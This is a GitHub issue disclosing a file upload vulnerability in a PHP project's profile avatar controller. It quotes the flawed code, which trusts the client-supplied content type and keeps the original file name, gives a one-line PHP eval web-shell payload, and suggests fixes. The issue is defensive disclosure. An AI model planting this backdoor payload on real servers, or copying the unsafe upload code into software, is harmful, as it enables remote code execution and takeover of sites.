New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There are a File upload vulnerability allows attackers to upload PHP back door files #4

Open
FStac opened this Issue Oct 30, 2018 · 0 comments

Comments

Projects
None yet
1 participant
@FStac

FStac commented Oct 30, 2018

Vulnerability code at \app\Http\Controllers\Backend\ProfileController.php,start at line 21:
if ((($_FILES["avatar"]["type"] == "image/png") || ($_FILES["avatar"]["type"] == "image/jpeg") || ($_FILES["avatar"]["type"] == "image/pjpeg")) && ($_FILES["avatar"]["size"] < 1000000)) { if ($_FILES["avatar"]["error"] > 0) { return 1; } else { move_uploaded_file($_FILES["avatar"]["tmp_name"], 'uploads/' . $_FILES["avatar"]["name"]); $data = [ 'avatar' => "http://leslie.net.cn/uploads/" . $_FILES["avatar"]["name"], ];
The program uses some unreliable functions to judge whether it is a picture file or not.
** Attackers can modify file attributes and content-type by truncating data.**
PAYLOAD:
<?php @eval($_POST[value]);?>
fix suggestion:
1.usr in_array() or "==="compare with file extension name
2.Rename files when saving files. The naming rule of file names uses time stamp to splice the MD5 value of random numbers(md5(time()+rand(1,10000))).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment